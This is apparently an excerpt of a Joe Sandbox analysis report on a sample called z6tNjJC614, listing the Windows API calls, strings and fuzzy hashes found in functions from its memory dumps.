                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                      • String ID:
                                                                      • API String ID: 48991266-0
                                                                      • Opcode ID: d7104effc11c9391e143323842fc40191bfde2ab9bc25bab1c47f2afdcdf54c2
                                                                      • Instruction ID: a0c6dd1405d8d130ddeaf798f5b023cc9bd79950d58c29b3b2b565c938f64116
                                                                      • Opcode Fuzzy Hash: d7104effc11c9391e143323842fc40191bfde2ab9bc25bab1c47f2afdcdf54c2
                                                                      • Instruction Fuzzy Hash: 13F0303A200100ABCF016F55EC89A4ABF29FF85321F04C061FE099E266C731A811DBB4
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 00512231
                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0051223B
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00512250
                                                                      • GetStockObject.GDI32(00000005), ref: 00512258
                                                                      • GetWindowDC.USER32(?,00000000), ref: 0054BE83
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054BE90
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0054BEA9
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0054BEC2
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0054BEE2
                                                                      • ReleaseDC.USER32(?,00000000), ref: 0054BEED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1946975507-0
                                                                      • Opcode ID: 00271e1bebf5bef2ae81a2a582c4a080026a7c4d4307ae0b6527ce7ed4c08c87
                                                                      • Instruction ID: 32a5a975f89b26b213fae9791ef013f6bb4c350dea7585b9f7f91b13a18e98df
                                                                      • Opcode Fuzzy Hash: 00271e1bebf5bef2ae81a2a582c4a080026a7c4d4307ae0b6527ce7ed4c08c87
                                                                      • Instruction Fuzzy Hash: 68E03031504144AAEB215F64EC0D7D83F10EB15336F118367FA69880E1877145A4EB52
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 0056871B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,005682E6), ref: 00568722
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005682E6), ref: 0056872F
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,005682E6), ref: 00568736
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %Z
                                                                      • API String ID: 0-2273115281
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __itow_s
                                                                      • String ID: xb]$xb]
                                                                      • API String ID: 3653519197-4042768884
                                                                      APIs
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • __wcsnicmp.LIBCMT ref: 0057B02D
                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0057B0F6
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                      • String ID: LPT
                                                                      • API String ID: 3222508074-1350329615
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00522968
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00522981
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      APIs
                                                                        • Part of subcall function 00514F0B: __fread_nolock.LIBCMT ref: 00514F29
                                                                      • _wcscmp.LIBCMT ref: 00579824
                                                                      • _wcscmp.LIBCMT ref: 00579837
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcscmp$__fread_nolock
                                                                      • String ID: FILE
                                                                      • API String ID: 4029003684-3121273764
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID: Dd]$Dd]
                                                                      • API String ID: 1473721057-843470525
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0058259E
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 005825D4
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CrackInternet_memset
                                                                      • String ID: |
                                                                      • API String ID: 1413715105-2343686810
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00597B61
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00597B76
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00596B17
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00596B53
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572911
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0057294C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00596761
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0059676C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: dd08c3ea93ebd58cd5da592091ef1b11ae29ceadbcb5f2e8a830e6d8d2324a63
                                                                      • Instruction ID: ac8b63e83f84213f869b6ae856bbf012599cc99207ae1637a485915a66a4207d
                                                                      • Opcode Fuzzy Hash: dd08c3ea93ebd58cd5da592091ef1b11ae29ceadbcb5f2e8a830e6d8d2324a63
                                                                      • Instruction Fuzzy Hash: D611BF71200209AFEF218F94DC84EFB3B6AFB883A8F110129F91897290D675EC5597A0
APIs
  • Part of subcall function 00511D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00511D73
  • Part of subcall function 00511D35: GetStockObject.GDI32(00000011), ref: 00511D87
  • Part of subcall function 00511D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00511D91
• GetWindowRect.USER32(00000000,?), ref: 00596C71
• GetSysColor.USER32(00000012), ref: 00596C8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 0f6f75e5cde3f9c8eace3fb61229ad48f03e61eb409ec796d6551bfb4027f74f
• Instruction ID: 2a3005c29531c1b752760d7afa76c6b1dfcadc4c7eb5882d66ac66b5f81cac10
• Opcode Fuzzy Hash: 0f6f75e5cde3f9c8eace3fb61229ad48f03e61eb409ec796d6551bfb4027f74f
• Instruction Fuzzy Hash: 5921267662020AAFDF04DFA8CC45EEA7BA8FB08314F114629F995D2250E735E864DB60
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 005969A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005969B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: f3bcf810217fa31090dda183f943197991a753774b0cf26456538943ca0b2c7c
• Instruction ID: e82d58a104aea49e4373f961aeeb24b234df0d9d326600c1e7b1807637012fbe
• Opcode Fuzzy Hash: f3bcf810217fa31090dda183f943197991a753774b0cf26456538943ca0b2c7c
• Instruction Fuzzy Hash: B8118871100208ABEF108F64DC84EEB3BA9FB153B8F614724F9A5971E0C735DC98AB60
APIs
• _memset.LIBCMT ref: 00572A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00572A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 42151d993736bea06f77cee2be294086e0792844d909f0ad887061e855fe12d5
• Instruction ID: b528e996ab15f985d29bbf3012b46e711ccdcebce991979bc3d3f432df80147d
• Opcode Fuzzy Hash: 42151d993736bea06f77cee2be294086e0792844d909f0ad887061e855fe12d5
• Instruction Fuzzy Hash: 5611B632D01114ABDF31DB5AEC44BAA7BB8BB45310F158026E95DE7290E7B0AD0AE791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0058222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00582255
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: f751b49b8e166e26fbb170b64061b63ee4f00f38495c32cdeb46658988410ebe
• Instruction ID: 141b8862382fe8b314a06e6a425cafd9180422b276a457a0d928058e46a5ea6c
• Opcode Fuzzy Hash: f751b49b8e166e26fbb170b64061b63ee4f00f38495c32cdeb46658988410ebe
• Instruction Fuzzy Hash: 51110EB4501225BADB24AF518CC8EBBFFA8FF16351F10862AFD06A6000D2706894DBF0
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00513C14,005D52F8,?,?,?), ref: 0052096E
  • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
• _wcscat.LIBCMT ref: 00554CB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: FullNamePath_memmove_wcscat
• String ID: S]
• API String ID: 257928180-1618851650
• Opcode ID: 7ae0467daaaa230898f0c6f8a528460e1749fcf437f23bf66c1ddfa43289638c
• Instruction ID: 4b8ade007b75049128c5b829a2f6b12b3062b49b2e59539467d37f686a5910e3
• Opcode Fuzzy Hash: 7ae0467daaaa230898f0c6f8a528460e1749fcf437f23bf66c1ddfa43289638c
• Instruction Fuzzy Hash: 3611E53190521AAB9B10EF64D80AEDD7FF8BF4C350B0048A3B945D32C2EA7096C85B14
APIs
  • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
  • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00568E73
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 598c6f4c27e5d9c99999073933989238795b1366c2274f95fdef0ae7ce48550c
• Instruction ID: 3450d158c25505eaaf6c6227f3bd0c217b0220fd10eabbdbaf60e61ac9dd251f
• Opcode Fuzzy Hash: 598c6f4c27e5d9c99999073933989238795b1366c2274f95fdef0ae7ce48550c
• Instruction Fuzzy Hash: 7B01F5B560121AAB9B14EBE4CC49DFE7B6CBF85320B000A19B831672D1EE315C48C650
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: 6313f35ca42506e33769b7e561dbb9574ebdb84b678d151eb3eea1a6890c7580
• Instruction ID: c3b992aa99d3bdd8768da1321237ea5142530ac27cba51b725b9e5fcc6b8a795
• Opcode Fuzzy Hash: 6313f35ca42506e33769b7e561dbb9574ebdb84b678d151eb3eea1a6890c7580
• Instruction Fuzzy Hash: 9A01F9719042187EDB28CAA8C81AEFE7FF8EB11301F00459EF556D2181E874A6049760
APIs
  • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
  • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00568D6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 45ae9058248e24c33088497a333de374a6190caee534680cdd6c392c82b01113
• Instruction ID: ed1eca9dce1e28ddb9774bf08332387d02701c810f574cb53a6a2ddea82fc94c
• Opcode Fuzzy Hash: 45ae9058248e24c33088497a333de374a6190caee534680cdd6c392c82b01113
• Instruction Fuzzy Hash: C701D471A4110EABDB14EBE0C95AEFE7BB8BF55300F10011AB801632D1DE205E48D6B1
APIs
  • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
  • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00568DEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 16d6d4f4eaf8a2b43c3ca7a2c504652fe0baab6707eea487c70dfb8cce180231
• Instruction ID: c14d7ee557ab011ba1b3c9c7e3b6d4b4d4095465680b555a19d56f1a3c628dfd
• Opcode Fuzzy Hash: 16d6d4f4eaf8a2b43c3ca7a2c504652fe0baab6707eea487c70dfb8cce180231
• Instruction Fuzzy Hash: F801A2B1A4110EABDB11EAE4C94AEFE7FBCBF55300F14051AB905B32D2DE254E48D672
APIs
• VariantInit.OLEAUT32(?), ref: 0056C534
  • Part of subcall function 0056C816: _memmove.LIBCMT ref: 0056C860
  • Part of subcall function 0056C816: VariantInit.OLEAUT32(00000000), ref: 0056C882
  • Part of subcall function 0056C816: VariantCopy.OLEAUT32(00000000,?), ref: 0056C88C
• VariantClear.OLEAUT32(?), ref: 0056C556
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Variant$Init$ClearCopy_memmove
• String ID: d}\
• API String ID: 2932060187-1221828746
• Opcode ID: 37bad20083f5c1cbcacf6a0db946b143d4dcf0d209c7331e80fef34b169b7bbd
• Instruction ID: 344eb60a79675dad089c4a964a26052a28fbf1c204b87045522f5ad5fcf1f394
• Opcode Fuzzy Hash: 37bad20083f5c1cbcacf6a0db946b143d4dcf0d209c7331e80fef34b169b7bbd
• Instruction Fuzzy Hash: 2F1100719007099FC710DF99D88499AFBF8FF18310B50866FE58AD7611D771AA49CF90
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 8d825ebcba772db193f0ec316656abcdcae4b8abdbd8326062589f42d733ed0b
• Instruction ID: 73ae47a529f9d7024ecfefe93819c99c61881a8371c4f2565edf17db9b2b87d6
• Opcode Fuzzy Hash: 8d825ebcba772db193f0ec316656abcdcae4b8abdbd8326062589f42d733ed0b
• Instruction Fuzzy Hash: D9E0D8326002292BD7209B99AC49FB7FBACFB95B70F01006BFD04D3151EA609A558BE1
                                                                      APIs
                                                                        • Part of subcall function 0054B314: _memset.LIBCMT ref: 0054B321
                                                                        • Part of subcall function 00530940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0054B2F0,?,?,?,0051100A), ref: 00530945
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 0054B2F4
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 0054B303
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0054B2FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3158253471-631824599
                                                                      • Opcode ID: 74124b862e6d2d5e8e443b84413f93f97c788cf2465f18f0434e7eb3c6abe6b2
                                                                      • Instruction ID: bbbae6d1705dc3003f92ed982c27b974a4eaef1d1766a94eed1c9f3cce9fdd30
                                                                      • Opcode Fuzzy Hash: 74124b862e6d2d5e8e443b84413f93f97c788cf2465f18f0434e7eb3c6abe6b2
                                                                      • Instruction Fuzzy Hash: 69E06D742007118BE720DF2AD8083867FE8BF14348F018D2EE446C7240E7B4E448CBB1
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00551775
                                                                        • Part of subcall function 0058BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0055195E,?), ref: 0058BFFE
                                                                        • Part of subcall function 0058BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C010
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0055196D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                      • String ID: WIN_XPe
                                                                      • API String ID: 582185067-3257408948
                                                                      • Opcode ID: 46f663777a07377538ce81f287b52ee40d0147fbae6aadca0858cba897a020f8
                                                                      • Instruction ID: edd937c0b2616eafacd39f30a7882fe27a00b5a9e466b97d285dbce46c237ff2
                                                                      • Opcode Fuzzy Hash: 46f663777a07377538ce81f287b52ee40d0147fbae6aadca0858cba897a020f8
                                                                      • Instruction Fuzzy Hash: 0DF01570810009EBDB15DB98C998BECBFB8BB18302F140497E502A20A1CB314E88EF64
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0059596E
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00595981
                                                                        • Part of subcall function 00575244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
